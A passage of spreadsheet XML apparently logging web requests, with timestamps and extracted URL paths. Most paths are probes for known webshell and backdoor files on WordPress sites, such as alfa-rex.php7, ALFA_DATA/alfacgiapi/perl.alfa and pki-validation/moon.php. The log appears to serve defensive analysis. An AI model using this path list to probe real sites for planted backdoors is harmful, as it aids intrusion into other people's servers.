      <c r="B4557" t="s">
        <v>1409</v>
      </c>
      <c r="C4557" t="s">
        <v>997</v>
      </c>
      <c r="D4557" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E4557" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4558" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4558" s="1">
        <v>45180.037986111114</v>
      </c>
      <c r="B4558" t="s">
        <v>1409</v>
      </c>
      <c r="C4558" t="s">
        <v>997</v>
      </c>
      <c r="D4558" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E4558" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4559" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4559" s="1">
        <v>45180.037256944444</v>
      </c>
      <c r="B4559" t="s">
        <v>1409</v>
      </c>
      <c r="C4559" t="s">
        <v>1572</v>
      </c>
      <c r="D4559" t="str">
        <f t="shared" si="71"/>
        <v>.well-known/pki-validation/admin.php</v>
      </c>
      <c r="E4559" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4560" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4560" s="1">
        <v>45180.037106481483</v>
      </c>
      <c r="B4560" t="s">
        <v>1409</v>
      </c>
      <c r="C4560" t="s">
        <v>963</v>
      </c>
      <c r="D4560" t="str">
        <f t="shared" si="71"/>
        <v>1index.php</v>
      </c>
      <c r="E4560" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4561" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4561" s="1">
        <v>45180.037037037036</v>
      </c>
      <c r="B4561" t="s">
        <v>1409</v>
      </c>
      <c r="C4561" t="s">
        <v>963</v>
      </c>
      <c r="D4561" t="str">
        <f t="shared" si="71"/>
        <v>1index.php</v>
      </c>
      <c r="E4561" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4562" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4562" s="1">
        <v>45180.036979166667</v>
      </c>
      <c r="B4562" t="s">
        <v>1409</v>
      </c>
      <c r="C4562" t="s">
        <v>1573</v>
      </c>
      <c r="D4562" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/hellopress/wp_mna.php</v>
      </c>
      <c r="E4562" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4563" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4563" s="1">
        <v>45180.036863425928</v>
      </c>
      <c r="B4563" t="s">
        <v>1409</v>
      </c>
      <c r="C4563" t="s">
        <v>1573</v>
      </c>
      <c r="D4563" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/hellopress/wp_mna.php</v>
      </c>
      <c r="E4563" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4564" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4564" s="1">
        <v>45180.036782407406</v>
      </c>
      <c r="B4564" t="s">
        <v>1409</v>
      </c>
      <c r="C4564" t="s">
        <v>695</v>
      </c>
      <c r="D4564" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E4564" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4565" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4565" s="1">
        <v>45180.036689814813</v>
      </c>
      <c r="B4565" t="s">
        <v>1409</v>
      </c>
      <c r="C4565" t="s">
        <v>695</v>
      </c>
      <c r="D4565" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E4565" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4566" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4566" s="1">
        <v>45180.036377314813</v>
      </c>
      <c r="B4566" t="s">
        <v>1409</v>
      </c>
      <c r="C4566" t="s">
        <v>1574</v>
      </c>
      <c r="D4566" t="str">
        <f t="shared" si="71"/>
        <v>.well-known/pki-validation/moon.php</v>
      </c>
      <c r="E4566" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4567" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4567" s="1">
        <v>45180.036006944443</v>
      </c>
      <c r="B4567" t="s">
        <v>1409</v>
      </c>
      <c r="C4567" t="s">
        <v>1575</v>
      </c>
      <c r="D4567" t="str">
        <f t="shared" si="71"/>
        <v>wp-includes/sodium_compat/network.php</v>
      </c>
      <c r="E4567" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4568" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4568" s="1">
        <v>45180.035902777781</v>
      </c>
      <c r="B4568" t="s">
        <v>1409</v>
      </c>
      <c r="C4568" t="s">
        <v>1575</v>
      </c>
      <c r="D4568" t="str">
        <f t="shared" si="71"/>
        <v>wp-includes/sodium_compat/network.php</v>
      </c>
      <c r="E4568" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4569" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4569" s="1">
        <v>45180.035833333335</v>
      </c>
      <c r="B4569" t="s">
        <v>1409</v>
      </c>
      <c r="C4569" t="s">
        <v>1187</v>
      </c>
      <c r="D4569" t="str">
        <f t="shared" si="71"/>
        <v>alfa-rex.php7</v>
      </c>
      <c r="E4569" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4570" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4570" s="1">
        <v>45180.03565972222</v>
      </c>
      <c r="B4570" t="s">
        <v>1409</v>
      </c>
      <c r="C4570" t="s">
        <v>1187</v>
      </c>
      <c r="D4570" t="str">
        <f t="shared" si="71"/>
        <v>alfa-rex.php7</v>
      </c>
      <c r="E4570" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4571" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4571" s="1">
        <v>45180.035578703704</v>
      </c>
      <c r="B4571" t="s">
        <v>1409</v>
      </c>
      <c r="C4571" t="s">
        <v>1576</v>
      </c>
      <c r="D4571" t="str">
        <f t="shared" si="71"/>
        <v>wp-includes/IXR/class-IXR-date-ajax-response.php</v>
      </c>
      <c r="E4571" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4572" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4572" s="1">
        <v>45180.035486111112</v>
      </c>
      <c r="B4572" t="s">
        <v>1409</v>
      </c>
      <c r="C4572" t="s">
        <v>1576</v>
      </c>
      <c r="D4572" t="str">
        <f t="shared" si="71"/>
        <v>wp-includes/IXR/class-IXR-date-ajax-response.php</v>
      </c>
      <c r="E4572" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4573" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4573" s="1">
        <v>45180.035405092596</v>
      </c>
      <c r="B4573" t="s">
        <v>1409</v>
      </c>
      <c r="C4573" t="s">
        <v>1126</v>
      </c>
      <c r="D4573" t="str">
        <f t="shared" si="71"/>
        <v>repeater.php</v>
      </c>
      <c r="E4573" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4574" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4574" s="1">
        <v>45180.035312499997</v>
      </c>
      <c r="B4574" t="s">
        <v>1409</v>
      </c>
      <c r="C4574" t="s">
        <v>1126</v>
      </c>
      <c r="D4574" t="str">
        <f t="shared" si="71"/>
        <v>repeater.php</v>
      </c>
      <c r="E4574" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4575" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4575" s="1">
        <v>45180.035243055558</v>
      </c>
      <c r="B4575" t="s">
        <v>1409</v>
      </c>
      <c r="C4575" t="s">
        <v>1577</v>
      </c>
      <c r="D4575" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/hello-element/footer.php</v>
      </c>
      <c r="E4575" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4576" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4576" s="1">
        <v>45180.035127314812</v>
      </c>
      <c r="B4576" t="s">
        <v>1409</v>
      </c>
      <c r="C4576" t="s">
        <v>1577</v>
      </c>
      <c r="D4576" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/hello-element/footer.php</v>
      </c>
      <c r="E4576" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4577" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4577" s="1">
        <v>45180.035046296296</v>
      </c>
      <c r="B4577" t="s">
        <v>1409</v>
      </c>
      <c r="C4577" t="s">
        <v>1578</v>
      </c>
      <c r="D4577" t="str">
        <f t="shared" si="71"/>
        <v>alfanew.php7</v>
      </c>
      <c r="E4577" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4578" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4578" s="1">
        <v>45180.03497685185</v>
      </c>
      <c r="B4578" t="s">
        <v>1409</v>
      </c>
      <c r="C4578" t="s">
        <v>1578</v>
      </c>
      <c r="D4578" t="str">
        <f t="shared" si="71"/>
        <v>alfanew.php7</v>
      </c>
      <c r="E4578" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4579" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4579" s="1">
        <v>45180.034918981481</v>
      </c>
      <c r="B4579" t="s">
        <v>1409</v>
      </c>
      <c r="C4579" t="s">
        <v>1579</v>
      </c>
      <c r="D4579" t="str">
        <f t="shared" si="71"/>
        <v>alfanew.php</v>
      </c>
      <c r="E4579" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4580" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4580" s="1">
        <v>45180.034837962965</v>
      </c>
      <c r="B4580" t="s">
        <v>1409</v>
      </c>
      <c r="C4580" t="s">
        <v>1579</v>
      </c>
      <c r="D4580" t="str">
        <f t="shared" si="71"/>
        <v>alfanew.php</v>
      </c>
      <c r="E4580" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4581" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4581" s="1">
        <v>45180.034189814818</v>
      </c>
      <c r="B4581" t="s">
        <v>1409</v>
      </c>
      <c r="C4581" t="s">
        <v>1277</v>
      </c>
      <c r="D4581" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/revslider/includes/external/page/</v>
      </c>
      <c r="E4581" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4582" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4582" s="1">
        <v>45180.03402777778</v>
      </c>
      <c r="B4582" t="s">
        <v>1409</v>
      </c>
      <c r="C4582" t="s">
        <v>1277</v>
      </c>
      <c r="D4582" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/revslider/includes/external/page/</v>
      </c>
      <c r="E4582" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4583" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4583" s="1">
        <v>45180.033912037034</v>
      </c>
      <c r="B4583" t="s">
        <v>1409</v>
      </c>
      <c r="C4583" t="s">
        <v>392</v>
      </c>
      <c r="D4583" t="str">
        <f t="shared" si="71"/>
        <v>admin.php</v>
      </c>
      <c r="E4583" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4584" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4584" s="1">
        <v>45180.033831018518</v>
      </c>
      <c r="B4584" t="s">
        <v>1409</v>
      </c>
      <c r="C4584" t="s">
        <v>392</v>
      </c>
      <c r="D4584" t="str">
        <f t="shared" si="71"/>
        <v>admin.php</v>
      </c>
      <c r="E4584" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4585" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4585" s="1">
        <v>45180.033750000002</v>
      </c>
      <c r="B4585" t="s">
        <v>1409</v>
      </c>
      <c r="C4585" t="s">
        <v>1580</v>
      </c>
      <c r="D4585" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/sketch/404.php</v>
      </c>
      <c r="E4585" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4586" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4586" s="1">
        <v>45180.03365740741</v>
      </c>
      <c r="B4586" t="s">
        <v>1409</v>
      </c>
      <c r="C4586" t="s">
        <v>1580</v>
      </c>
      <c r="D4586" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/sketch/404.php</v>
      </c>
      <c r="E4586" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4587" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4587" s="1">
        <v>45180.033599537041</v>
      </c>
      <c r="B4587" t="s">
        <v>1409</v>
      </c>
      <c r="C4587" t="s">
        <v>688</v>
      </c>
      <c r="D4587" t="str">
        <f t="shared" si="71"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E4587" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4588" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4588" s="1">
        <v>45180.033460648148</v>
      </c>
      <c r="B4588" t="s">
        <v>1409</v>
      </c>
      <c r="C4588" t="s">
        <v>688</v>
      </c>
      <c r="D4588" t="str">
        <f t="shared" si="71"/>
        <v>wp-admin/dropdown.php</v>
      </c>
      <c r="E4588" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4589" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4589" s="1">
        <v>45179.937175925923</v>
      </c>
      <c r="B4589" t="s">
        <v>1520</v>
      </c>
      <c r="C4589" t="s">
        <v>298</v>
      </c>
      <c r="D4589" t="str">
        <f t="shared" si="71"/>
        <v>inputs.php</v>
      </c>
      <c r="E4589" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4590" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4590" s="1">
        <v>45179.936956018515</v>
      </c>
      <c r="B4590" t="s">
        <v>1520</v>
      </c>
      <c r="C4590" t="s">
        <v>298</v>
      </c>
      <c r="D4590" t="str">
        <f t="shared" si="71"/>
        <v>inputs.php</v>
      </c>
      <c r="E4590" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4591" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4591" s="1">
        <v>45179.841064814813</v>
      </c>
      <c r="B4591" t="s">
        <v>1292</v>
      </c>
      <c r="C4591" t="s">
        <v>885</v>
      </c>
      <c r="D4591" t="str">
        <f t="shared" si="71"/>
        <v>1.php</v>
      </c>
      <c r="E4591" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4592" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4592" s="1">
        <v>45179.84065972222</v>
      </c>
      <c r="B4592" t="s">
        <v>1292</v>
      </c>
      <c r="C4592" t="s">
        <v>1529</v>
      </c>
      <c r="D4592" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/style-css.php</v>
      </c>
      <c r="E4592" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4593" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4593" s="1">
        <v>45179.791458333333</v>
      </c>
      <c r="B4593" t="s">
        <v>1292</v>
      </c>
      <c r="C4593" t="s">
        <v>1524</v>
      </c>
      <c r="D4593" t="str">
        <f t="shared" si="71"/>
        <v>1.php</v>
      </c>
      <c r="E4593" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4594" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4594" s="1">
        <v>45179.791365740741</v>
      </c>
      <c r="B4594" t="s">
        <v>1292</v>
      </c>
      <c r="C4594" t="s">
        <v>1525</v>
      </c>
      <c r="D4594" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/style-css.php</v>
      </c>
      <c r="E4594" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4595" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4595" s="1">
        <v>45179.664976851855</v>
      </c>
      <c r="B4595" t="s">
        <v>1581</v>
      </c>
      <c r="C4595" t="s">
        <v>5</v>
      </c>
      <c r="D4595" t="str">
        <f t="shared" si="71"/>
        <v/>
      </c>
      <c r="E4595" t="s">
        <v>1582</v>
      </c>
    </row>
    <row r="4596" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4596" s="1">
        <v>45179.570474537039</v>
      </c>
      <c r="B4596" t="s">
        <v>1583</v>
      </c>
      <c r="C4596" t="s">
        <v>43</v>
      </c>
      <c r="D4596" t="str">
        <f t="shared" si="71"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4596" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4597" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4597" s="1">
        <v>45179.570462962962</v>
      </c>
      <c r="B4597" t="s">
        <v>1583</v>
      </c>
      <c r="C4597" t="s">
        <v>45</v>
      </c>
      <c r="D4597" t="str">
        <f t="shared" si="71"/>
        <v>alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4597" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4598" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4598" s="1">
        <v>45179.570451388892</v>
      </c>
      <c r="B4598" t="s">
        <v>1583</v>
      </c>
      <c r="C4598" t="s">
        <v>46</v>
      </c>
      <c r="D4598" t="str">
        <f t="shared" si="71"/>
        <v>ALFA_DATA/alfacgiapi/perl.alfa</v>
      </c>
      <c r="E4598" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4599" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4599" s="1">
        <v>45179.570451388892</v>
      </c>
      <c r="B4599" t="s">
        <v>1583</v>
      </c>
      <c r="C4599" t="s">
        <v>43</v>
      </c>
      <c r="D4599" t="str">
        <f t="shared" si="71"/>
        <v>wp-plain.php</v>
      </c>
      <c r="E4599" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4600" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4600" s="1">
        <v>45179.171979166669</v>
      </c>
      <c r="B4600" t="s">
        <v>1412</v>
      </c>
      <c r="C4600" t="s">
        <v>997</v>
      </c>
      <c r="D4600" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E4600" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4601" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4601" s="1">
        <v>45179.171909722223</v>
      </c>
      <c r="B4601" t="s">
        <v>1412</v>
      </c>
      <c r="C4601" t="s">
        <v>997</v>
      </c>
      <c r="D4601" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/press/wp-class.php</v>
      </c>
      <c r="E4601" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4602" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4602" s="1">
        <v>45179.171423611115</v>
      </c>
      <c r="B4602" t="s">
        <v>1412</v>
      </c>
      <c r="C4602" t="s">
        <v>1572</v>
      </c>
      <c r="D4602" t="str">
        <f t="shared" si="71"/>
        <v>.well-known/pki-validation/admin.php</v>
      </c>
      <c r="E4602" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4603" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4603" s="1">
        <v>45179.171331018515</v>
      </c>
      <c r="B4603" t="s">
        <v>1412</v>
      </c>
      <c r="C4603" t="s">
        <v>963</v>
      </c>
      <c r="D4603" t="str">
        <f t="shared" si="71"/>
        <v>1index.php</v>
      </c>
      <c r="E4603" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4604" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4604" s="1">
        <v>45179.171284722222</v>
      </c>
      <c r="B4604" t="s">
        <v>1412</v>
      </c>
      <c r="C4604" t="s">
        <v>963</v>
      </c>
      <c r="D4604" t="str">
        <f t="shared" si="71"/>
        <v>1index.php</v>
      </c>
      <c r="E4604" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4605" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4605" s="1">
        <v>45179.171238425923</v>
      </c>
      <c r="B4605" t="s">
        <v>1412</v>
      </c>
      <c r="C4605" t="s">
        <v>1573</v>
      </c>
      <c r="D4605" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/hellopress/wp_mna.php</v>
      </c>
      <c r="E4605" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4606" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4606" s="1">
        <v>45179.170995370368</v>
      </c>
      <c r="B4606" t="s">
        <v>1412</v>
      </c>
      <c r="C4606" t="s">
        <v>1573</v>
      </c>
      <c r="D4606" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/plugins/hellopress/wp_mna.php</v>
      </c>
      <c r="E4606" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4607" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4607" s="1">
        <v>45179.170960648145</v>
      </c>
      <c r="B4607" t="s">
        <v>1412</v>
      </c>
      <c r="C4607" t="s">
        <v>695</v>
      </c>
      <c r="D4607" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E4607" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4608" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4608" s="1">
        <v>45179.170902777776</v>
      </c>
      <c r="B4608" t="s">
        <v>1412</v>
      </c>
      <c r="C4608" t="s">
        <v>695</v>
      </c>
      <c r="D4608" t="str">
        <f t="shared" si="71"/>
        <v>wp-content/themes/seotheme/mar.php</v>
      </c>
      <c r="E4608" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4609" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4609" s="1">
        <v>45179.170810185184</v>
      </c>
      <c r="B4609" t="s">
        <v>1412</v>
      </c>
      <c r="C4609" t="s">
        <v>1574</v>
      </c>
      <c r="D4609" t="str">
        <f t="shared" si="71"/>
        <v>.well-known/pki-validation/moon.php</v>
      </c>
      <c r="E4609" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4610" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4610" s="1">
        <v>45179.170567129629</v>
      </c>
      <c r="B4610" t="s">
        <v>1412</v>
      </c>
      <c r="C4610" t="s">
        <v>1575</v>
      </c>
      <c r="D4610" t="str">
        <f t="shared" ref="D4610:D4673" si="72">MID(C4610,FIND("#", SUBSTITUTE(C4610, "/", "#", 3))+1,LEN(C4610)-FIND("#", SUBSTITUTE(C4610, "/", "#", 3))+1)</f>
        <v>wp-includes/sodium_compat/network.php</v>
      </c>
      <c r="E4610" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4611" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4611" s="1">
        <v>45179.170497685183</v>
      </c>
      <c r="B4611" t="s">
        <v>1412</v>
      </c>
      <c r="C4611" t="s">
        <v>1575</v>
      </c>
      <c r="D4611" t="str">
        <f t="shared" si="72"/>
        <v>wp-includes/sodium_compat/network.php</v>
      </c>
      <c r="E4611" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4612" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4612" s="1">
        <v>45179.170289351852</v>
      </c>
      <c r="B4612" t="s">
        <v>1412</v>
      </c>
      <c r="C4612" t="s">
        <v>1187</v>
      </c>
      <c r="D4612" t="str">
        <f t="shared" si="72"/>
        <v>alfa-rex.php7</v>
      </c>
      <c r="E4612" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4613" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4613" s="1">
        <v>45179.170254629629</v>
      </c>
      <c r="B4613" t="s">
        <v>1412</v>
      </c>
      <c r="C4613" t="s">
        <v>1187</v>
      </c>
      <c r="D4613" t="str">
        <f t="shared" si="72"/>
        <v>alfa-rex.php7</v>
      </c>
      <c r="E4613" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4614" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4614" s="1">
        <v>45179.170034722221</v>
      </c>
      <c r="B4614" t="s">
        <v>1412</v>
      </c>
      <c r="C4614" t="s">
        <v>1576</v>
      </c>
      <c r="D4614" t="str">
        <f t="shared" si="72"/>
        <v>wp-includes/IXR/class-IXR-date-ajax-response.php</v>
      </c>
      <c r="E4614" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4615" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4615" s="1">
        <v>45179.169930555552</v>
      </c>
      <c r="B4615" t="s">
        <v>1412</v>
      </c>
      <c r="C4615" t="s">
        <v>1576</v>
      </c>
      <c r="D4615" t="str">
        <f t="shared" si="72"/>
        <v>wp-includes/IXR/class-IXR-date-ajax-response.php</v>
      </c>
      <c r="E4615" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4616" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4616" s="1">
        <v>45179.169548611113</v>
      </c>
      <c r="B4616" t="s">
        <v>1412</v>
      </c>
      <c r="C4616" t="s">
        <v>1126</v>
      </c>
      <c r="D4616" t="str">
        <f t="shared" si="72"/>
        <v>repeater.php</v>
      </c>
      <c r="E4616" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4617" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4617" s="1">
        <v>45179.169409722221</v>
      </c>
      <c r="B4617" t="s">
        <v>1412</v>
      </c>
      <c r="C4617" t="s">
        <v>1126</v>
      </c>
      <c r="D4617" t="str">
        <f t="shared" si="72"/>
        <v>repeater.php</v>
      </c>
      <c r="E4617" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4618" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4618" s="1">
        <v>45179.169108796297</v>
      </c>
      <c r="B4618" t="s">
        <v>1412</v>
      </c>
      <c r="C4618" t="s">
        <v>1578</v>
      </c>
      <c r="D4618" t="str">
        <f t="shared" si="72"/>
        <v>alfanew.php7</v>
      </c>
      <c r="E4618" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4619" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4619" s="1">
        <v>45179.168981481482</v>
      </c>
      <c r="B4619" t="s">
        <v>1412</v>
      </c>
      <c r="C4619" t="s">
        <v>1578</v>
      </c>
      <c r="D4619" t="str">
        <f t="shared" si="72"/>
        <v>alfanew.php7</v>
      </c>
      <c r="E4619" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4620" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4620" s="1">
        <v>45179.168877314813</v>
      </c>
      <c r="B4620" t="s">
        <v>1412</v>
      </c>
      <c r="C4620" t="s">
        <v>1579</v>
      </c>
      <c r="D4620" t="str">
        <f t="shared" si="72"/>
        <v>alfanew.php</v>
      </c>
      <c r="E4620" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4621" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4621" s="1">
        <v>45179.168796296297</v>
      </c>
      <c r="B4621" t="s">
        <v>1412</v>
      </c>
      <c r="C4621" t="s">
        <v>1579</v>
      </c>
      <c r="D4621" t="str">
        <f t="shared" si="72"/>
        <v>alfanew.php</v>
      </c>
      <c r="E4621" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4622" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4622" s="1">
        <v>45179.16814814815</v>
      </c>
      <c r="B4622" t="s">
        <v>1412</v>
      </c>
      <c r="C4622" t="s">
        <v>1277</v>
      </c>
      <c r="D4622" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/revslider/includes/external/page/</v>
      </c>
      <c r="E4622" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4623" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4623" s="1">
        <v>45179.168090277781</v>
      </c>
      <c r="B4623" t="s">
        <v>1412</v>
      </c>
      <c r="C4623" t="s">
        <v>1277</v>
      </c>
      <c r="D4623" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/plugins/revslider/includes/external/page/</v>
      </c>
      <c r="E4623" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4624" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4624" s="1">
        <v>45179.168032407404</v>
      </c>
      <c r="B4624" t="s">
        <v>1412</v>
      </c>
      <c r="C4624" t="s">
        <v>392</v>
      </c>
      <c r="D4624" t="str">
        <f t="shared" si="72"/>
        <v>admin.php</v>
      </c>
      <c r="E4624" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4625" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4625" s="1">
        <v>45179.167916666665</v>
      </c>
      <c r="B4625" t="s">
        <v>1412</v>
      </c>
      <c r="C4625" t="s">
        <v>392</v>
      </c>
      <c r="D4625" t="str">
        <f t="shared" si="72"/>
        <v>admin.php</v>
      </c>
      <c r="E4625" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4626" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4626" s="1">
        <v>45179.16778935185</v>
      </c>
      <c r="B4626" t="s">
        <v>1412</v>
      </c>
      <c r="C4626" t="s">
        <v>1580</v>
      </c>
      <c r="D4626" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/themes/sketch/404.php</v>
      </c>
      <c r="E4626" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4627" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4627" s="1">
        <v>45179.167662037034</v>
      </c>
      <c r="B4627" t="s">
        <v>1412</v>
      </c>
      <c r="C4627" t="s">
        <v>1580</v>
      </c>
      <c r="D4627" t="str">
        <f t="shared" si="72"/>
        <v>wp-content/themes/sketch/404.php</v>
      </c>
      <c r="E4627" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4628" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A4628" s="1">
        <v>45179.167569444442</v>
      </c>
